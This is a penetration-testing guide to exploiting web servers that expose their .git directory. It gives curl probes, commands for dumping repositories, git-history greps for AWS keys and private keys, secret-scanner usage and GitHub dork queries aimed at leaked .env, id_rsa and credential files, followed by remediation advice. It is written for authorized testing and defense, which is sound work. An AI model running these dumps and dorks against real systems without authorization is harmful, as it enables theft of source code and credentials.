Exposed .git Recon: Dumping Repositories, Mining Secrets, and GitHub Dorking
A web server that serves its own .git directory is one of the highest-value, lowest-effort findings in web reconnaissance. When a deployment copies a working tree to the document root without stripping version-control metadata, the entire repository — every source file, every commit message, and every secret that was ever committed and later "removed" — becomes downloadable by anyone who knows the right paths. On an authorized engagement this single misconfiguration frequently collapses the gap between unauthenticated external access and full source-code review, hardcoded credentials, and internal infrastructure mapping.
This guide covers the full workflow a pentester uses against an exposed repository: confirming the exposure, reconstructing the working tree even when directory listing is disabled, mining deleted secrets out of commit history, pivoting to public code via GitHub dorking, and the automated tooling that ties it together. Everything here assumes you have written authorization to test the target in scope — Git recon is read-heavy and quiet, but it still touches systems you must be permitted to assess.
Confirming an Exposed .git Directory
The fastest signal is a request for /.git/HEAD. A valid Git repository returns a tiny file containing a ref pointer; a 404 or an HTML error page means the path is not exposed. Never rely on /.git/ returning a directory listing — most production servers disable autoindex, so the directory looks empty while the individual objects are still fully retrievable.
# The canonical one-liner: HEAD always exists in a real repo
curl -s https://target.example/.git/HEAD
# Expected: ref: refs/heads/main
# Other reliable indicator files
curl -s https://target.example/.git/config
curl -s https://target.example/.git/logs/HEAD
curl -s https://target.example/.git/index -o index.bin
# Quick triage of many hosts from a file
while read -r host; do
body=$(curl -s --max-time 10 "$host/.git/HEAD")
# Match on the body rather than the status code, so catch-all 200 pages are not flagged
case "$body" in "ref: "*) echo "EXPOSED: $host" ;; esac
done < hosts.txt
Watch for false positives. Single-page-app catch-all routing often returns 200 OK with an HTML body for every path, including /.git/HEAD. Always inspect the body: a real HEAD is a few bytes of plaintext starting with ref: (or a raw 40-character SHA-1 in detached-head state), never a <!DOCTYPE html>.
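The body check described above can be sketched as a small Python helper. The function name looks_like_git_head is hypothetical, and the sketch assumes a SHA-1 repository (40 hex characters); a SHA-256 repository would use 64.

```python
import re

# A bare 40-hex-character SHA-1, as found in a detached-HEAD state.
_SHA1_RE = re.compile(rb"[0-9a-f]{40}")


def looks_like_git_head(body: bytes) -> bool:
    """Return True if a response body plausibly is a real .git/HEAD file."""
    text = body.strip()
    # Symbolic ref, the usual case: "ref: refs/heads/main"
    if text.startswith(b"ref: refs/"):
        return True
    # Detached HEAD: a commit hash and nothing else
    return _SHA1_RE.fullmatch(text) is not None
```

Feeding it the raw bytes returned for /.git/HEAD filters out SPA catch-all pages that answer 200 with HTML.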
Dumping the Repository Without Directory Listing
When autoindex is off, you cannot simply recurse the directory. Instead you reconstruct the repository by following Git's internal object graph. Git stores everything as content-addressed objects under .git/objects/, named by their SHA-1 hash split into a two-character directory and a 38-character filename. The trick is to start from known references, parse each object you fetch, extract the hashes it points to, and fetch those in turn.
- Refs and packed-refs: .git/HEAD, .git/refs/heads/*, and .git/packed-refs give you the commit hashes that anchor the graph.
- Commit objects point to a tree object and to parent commits, letting you walk history backwards.
- Tree objects map filenames to blob hashes and to sub-tree hashes (directories).
- Blob objects are the actual file contents.
- The index (.git/index) lists every staged path and its blob hash, and is often the single richest source of object hashes.
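As a rough illustration of the first step, the sketch below turns the text of .git/packed-refs into a ref-to-hash map and converts a hash into its loose-object path. The names object_path and parse_packed_refs are hypothetical, and 40-character SHA-1 hashes are assumed.

```python
def object_path(sha: str) -> str:
    """Map a 40-char SHA-1 to its loose-object path relative to .git/."""
    if len(sha) != 40:
        raise ValueError("expected a 40-character SHA-1")
    # Two-character directory, 38-character filename
    return f"objects/{sha[:2]}/{sha[2:]}"


def parse_packed_refs(text: str) -> dict[str, str]:
    """Return {ref_name: sha} from the contents of .git/packed-refs."""
    refs = {}
    for line in text.splitlines():
        line = line.strip()
        # Skip blanks, the "# pack-refs with: ..." header, and "^<sha>" peeled-tag lines
        if not line or line.startswith(("#", "^")):
            continue
        sha, _, name = line.partition(" ")
        if len(sha) == 40 and name:
            refs[name] = sha
    return refs
```

Each hash in the returned map is a starting point for the graph walk: fetch object_path(sha) under /.git/ and parse what comes back.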
Git objects are zlib-compressed, so you decompress, read the type and hashes, and queue the next fetch. A minimal manual demonstration:
# Fetch and inflate a single loose object by hash
H=8c9b1f2a... # a 40-char SHA from HEAD or packed-refs
curl -s "https://target.example/.git/objects/${H:0:2}/${H:2}" \
| python3 -c "import sys,zlib; sys.stdout.buffer.write(zlib.decompress(sys.stdin.buffer.read()))"
# A commit object reveals its tree + parent — follow those hashes next
# tree d670460... <- fetch /.git/objects/d6/70460...
# parent 4a1c9e3... <- the previous commit
# author Jane Dev 1700000000 +0000
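The same step in Python, extended to pull out the hashes to fetch next, might look like the sketch below. All three function names are hypothetical. It assumes SHA-1 objects and handles only commits and trees; blobs need no parsing, and tags are ignored.

```python
import zlib


def parse_loose_object(raw: bytes) -> tuple[str, bytes]:
    """Inflate a loose object and split it into (type, payload)."""
    data = zlib.decompress(raw)
    # Layout is "<type> <size>\0<payload>"
    header, _, payload = data.partition(b"\x00")
    obj_type, _, size = header.partition(b" ")
    if int(size) != len(payload):
        raise ValueError("size in header does not match payload length")
    return obj_type.decode(), payload


def commit_links(payload: bytes) -> list[str]:
    """Return the tree and parent hashes named in a commit's header lines."""
    hashes = []
    for line in payload.split(b"\n"):
        if not line:  # a blank line ends the headers; the message follows
            break
        key, _, value = line.partition(b" ")
        if key in (b"tree", b"parent"):
            hashes.append(value.decode())
    return hashes


def tree_links(payload: bytes) -> list[tuple[str, str, str]]:
    """Return (mode, name, sha) for each entry of a binary tree object."""
    entries, pos = [], 0
    while pos < len(payload):
        space = payload.index(b" ", pos)
        nul = payload.index(b"\x00", space)
        mode = payload[pos:space].decode()
        name = payload[space + 1:nul].decode(errors="replace")
        sha = payload[nul + 1:nul + 21].hex()  # 20 raw bytes, not hex text
        entries.append((mode, name, sha))
        pos = nul + 21
    return entries
```

A dumper would queue every hash these functions return, fetch each one, and repeat until no unseen hashes remain.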
In practice nobody walks the graph by hand — tooling does it. But understanding the object model matters: it explains why dumps succeed even with listing disabled, and why you must also pull .git/objects/pack/*.pack and the corresponding .idx files, since older history is frequently delta-compressed into packfiles rather than stored as loose objects.
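Pack filenames contain a hash, so they cannot be guessed without a listing. One common way to discover them is .git/objects/info/packs, which lists each pack as a line of the form "P pack-<hash>.pack". That file is not mentioned above and is an assumption here: it exists only when git update-server-info has run, which a repack normally triggers. The sketch below, with the hypothetical name pack_paths, turns its contents into the paths to fetch.

```python
def pack_paths(info_packs: str) -> list[str]:
    """Turn the contents of .git/objects/info/packs into .pack/.idx paths."""
    paths = []
    for line in info_packs.splitlines():
        line = line.strip()
        # Each pack is listed as "P pack-<hash>.pack"
        if line.startswith("P ") and line.endswith(".pack"):
            name = line[2:].strip()
            paths.append(f"objects/pack/{name}")
            # The index sits next to the pack with an .idx extension
            paths.append(f"objects/pack/{name[:-len('.pack')]}.idx")
    return paths
```

The returned paths are relative to /.git/ and should be downloaded as binary files before running any Git command against the dump.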
Automated Dumping Tools
Several mature tools handle reference discovery, object-graph traversal, packfile retrieval, and final checkout. They make hundreds of small requests, so throttle them on production targets and respect any rate-limit guidance in your rules of engagement.
# git-dumper — the most reliable all-in-one dumper
pip install git-dumper
git-dumper https://target.example/.git/ ./dump
# It pulls refs, loose objects, packfiles, then runs `git checkout`
# GitTools — classic three-part toolkit
# 1) Dumper: blind-fetch objects when listing is off
./gitdumper.sh https://target.example/.git/ ./dump
# 2) Extractor: rebuild every commit into separate folders
./extractor.sh ./dump ./extracted
# 3) Finder: scan a list of hosts for exposed .git
# After dumping, restore any missing files Git knows about
cd dump && git checkout -- . 2>/dev/null
git status # shows files Git expected but couldn't fetch
A partial dump is still useful. Even if some blobs 404, git log, git show, and the recovered .git/config often expose remote URLs (sometimes with embedded credentials), CI tokens, and the developer email addresses you will reuse for password-spray or phishing-awareness assessment later.
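To make the remote-URL point concrete, here is a minimal sketch that pulls embedded credentials out of a recovered .git/config. The function name remotes_with_credentials is hypothetical. It uses a line-based regex rather than a full Git config parser, so quoted values or included files are out of scope.

```python
import re
from urllib.parse import urlsplit

# Matches "url = ..." and "pushurl = ..." lines inside [remote "..."] sections
_URL_LINE = re.compile(r"^\s*(?:url|pushurl)\s*=\s*(\S+)", re.MULTILINE)


def remotes_with_credentials(config_text: str) -> list[tuple[str, str, str]]:
    """Return (host, username, password) for HTTP(S) remotes that embed userinfo."""
    found = []
    for url in _URL_LINE.findall(config_text):
        parts = urlsplit(url)
        # scp-style remotes (git@host:org/repo.git) have no scheme and are skipped
        if parts.scheme in ("http", "https") and parts.username:
            found.append((parts.hostname, parts.username, parts.password or ""))
    return found
```

A token used as the username with no password (a common pattern for deploy tokens) is reported with an empty password field.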
Mining Secrets From Commit History
The real prize is history. Developers routinely commit an API key, notice it, delete it in the next commit, and assume it is gone. It is not — the blob still lives in the object database, reachable through the old commit. Once you have a local clone, you walk every revision of every file.
# Search the entire history (all commits, all branches) for a pattern
git log -p --all -S 'AKIA' | grep -i 'AKIA'
# Show every version of a file across history
git log --all --oneline -- config/database.yml
git show <commit>:config/database.yml   # substitute a hash from the log output above
# Diff-grep across history for common secret keywords
git log --all -p | grep -iE 'password|secret|api[_-]?key|token|BEGIN (RSA|EC|OPENSSH) PRIVATE KEY'
# Recover content from dangling/unreachable objects (deleted commits)
git fsck --unreachable | awk '/blob/ {print $3}' \
| while read b; do git cat-file -p "$b"; done | grep -iE 'AKIA|secret'
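The grep pipelines above can also be expressed as a short Python script, which makes it easier to label each hit with the rule that matched. This is a sketch only: the PATTERNS table is illustrative and far smaller than a real ruleset, and the names scan_patch_text and scan_repo are hypothetical.

```python
import re
import subprocess

# Illustrative patterns only; real rulesets are far larger.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_header": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "keyword_assignment": re.compile(
        r"(?i)\b(?:password|secret|api[_-]?key|token)\b\s*[:=]\s*\S+"
    ),
}


def scan_patch_text(patch: str) -> list[tuple[str, str]]:
    """Return (rule, line) for added or removed diff lines that match a pattern."""
    hits = []
    for line in patch.splitlines():
        # Inspect only "+"/"-" content lines; skip "+++ b/file" and "--- a/file" headers
        if not line.startswith(("+", "-")) or line.startswith(("+++ ", "--- ")):
            continue
        for rule, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.append((rule, line[1:].strip()))
    return hits


def scan_repo(path: str) -> list[tuple[str, str]]:
    """Run `git log -p --all` in `path` and scan the combined patch output."""
    out = subprocess.run(
        ["git", "-C", path, "log", "-p", "--all"],
        capture_output=True, text=True, errors="replace", check=True,
    ).stdout
    return scan_patch_text(out)
```

Calling scan_repo("./dump") covers every reachable commit on every ref; removed lines are included on purpose, since a deleted secret is exactly what this step is looking for.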
Dedicated history scanners are far more thorough than manual grep because they understand entropy and provider-specific key formats:
- trufflehog: trufflehog git file://./dump scans every commit and can verify live AWS, GitHub, Slack, and other tokens against their APIs to eliminate false positives.
- gitleaks: gitleaks detect --source ./dump -v uses a regex+entropy ruleset and emits a structured report ideal for a findings table.
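To show what an entropy check means in practice, the sketch below computes Shannon entropy per character and flags long, random-looking tokens. It is not how either tool is implemented. The function names, the 20-character minimum, and the 4.0-bit threshold are all assumptions chosen for illustration.

```python
import math
import re
from collections import Counter

# Candidate tokens: long runs of characters typical of keys and base64 blobs
_TOKEN_RE = re.compile(r"[A-Za-z0-9+/=_-]{20,}")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, from observed character frequencies."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def high_entropy_tokens(line: str, threshold: float = 4.0) -> list[str]:
    """Return tokens in `line` whose per-character entropy exceeds `threshold`."""
    return [t for t in _TOKEN_RE.findall(line) if shannon_entropy(t) > threshold]
```

Repetitive strings score near zero while random key material scores high, which is why entropy catches secrets that no keyword or prefix pattern would.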
Treat any recovered key as live until proven otherwise, and prove it only through actions your authorization permits — for AWS keys, a read-only aws sts get-caller-identity confirms validity and identity without touching customer data. You can sanity-check format and high-entropy candidates against the Secret Scanner before reporting.
GitHub Dorking for Public Source and Leaks
An exposed .git on the target's own server is one vector; the other is code the organization pushed to a public host. GitHub's code search supports targeted operators that surface secrets committed to public, fork, or gist repositories — including those by employees on personal accounts.
# Org-scoped secret hunting
org:target-org password
org:target-org filename:.env
org:target-org "BEGIN RSA PRIVATE KEY"
# Domain / provider-specific leaks across all of GitHub
"target.example" AKIA # AWS keys mentioning the target
"@target.example" filename:.npmrc _authToken
"target.example" filename:config.json apikey
# High-signal filenames and paths
path:**/.aws/credentials
filename:wp-config.php DB_PASSWORD
filename:id_rsa OR filename:id_ed25519
Pair this with the equivalent Shodan, Google, and Censys queries to spot exposed services and dev artifacts. The Search Dork Generator builds these queries for GitHub, Google, Shodan, and Censys from a single target input, and the Google Dorking cheat sheet covers the operator syntax for filetype, inurl, and site filters. Always cross-check timestamps: a leaked key that predates a known rotation may already be dead, while a fresh commit to a public fork is your most urgent finding.
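The org- and domain-scoped queries listed earlier are simple templates, so they can be generated per target. The sketch below fills them in and builds a code-search URL. The function names are hypothetical, and the query strings are copied from the list above rather than checked against GitHub's current search syntax.

```python
from urllib.parse import urlencode


def build_github_dorks(org: str, domain: str) -> list[str]:
    """Fill the org- and domain-scoped query templates for one target."""
    return [
        f"org:{org} password",
        f"org:{org} filename:.env",
        f'org:{org} "BEGIN RSA PRIVATE KEY"',
        f'"{domain}" AKIA',
        f'"@{domain}" filename:.npmrc _authToken',
        f'"{domain}" filename:config.json apikey',
    ]


def search_url(query: str) -> str:
    """Build a GitHub code-search URL for a query string."""
    return "https://github.com/search?" + urlencode({"q": query, "type": "code"})
```

Mapping search_url over build_github_dorks("target-org", "target.example") gives a list of links to open by hand during an authorized engagement.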
Defenses and Remediation
The fixes are cheap, and the highest-value report you write often includes them verbatim:
- Never deploy the .git directory. Build from a clean export (git archive) or strip .git in the deploy step. Treat the document root as build output, not a working copy.
- Block access at the web server. Return 404 for any dotfile path. In nginx: location ~ /\.git { deny all; return 404; }; in Apache: RedirectMatch 404 /\.git. Defense in depth even when the directory should not be there at all.
- Assume any committed secret is compromised forever. Rewriting history with git filter-repo or BFG removes the blob, but rotation is the only real remediation: invalidate and reissue the credential immediately.
- Keep secrets out of the repo entirely. Use environment variables, a secrets manager, and a committed .gitignore covering .env, key files, and config with credentials.
- Scan in CI. Run gitleaks or trufflehog as a pre-commit hook and a pipeline gate so a secret never reaches history in the first place.
- Monitor public exposure. Use GitHub secret scanning / push protection and periodic dork sweeps so a leak on a personal fork is caught before an attacker dorks it.
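The first item can be enforced mechanically in the deploy step. As a minimal sketch, the hypothetical function find_git_metadata below walks a build output directory and reports any .git directory or file. A pipeline could fail the deploy when the returned list is non-empty.

```python
import os


def find_git_metadata(root: str) -> list[str]:
    """Return paths of any .git directory or file found under `root`."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if ".git" in dirnames:
            hits.append(os.path.join(dirpath, ".git"))
            dirnames.remove(".git")  # no need to descend into it
        if ".git" in filenames:  # submodules and worktrees use a .git file
            hits.append(os.path.join(dirpath, ".git"))
    return sorted(hits)
```

This only checks the artifact before upload; the web server rule is still needed for hosts that were deployed before the check existed.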
For the reconnaissance phase that surrounds this technique — subdomain discovery, certificate transparency, and host triage that turns up forgotten dev servers serving .git — chain this work with the Recon Hub and the wider DNS enumeration workflow. Exposed repositories are most often found on staging and legacy hosts that surface only after thorough asset discovery, so a complete recon pipeline is what makes this finding repeatable rather than lucky.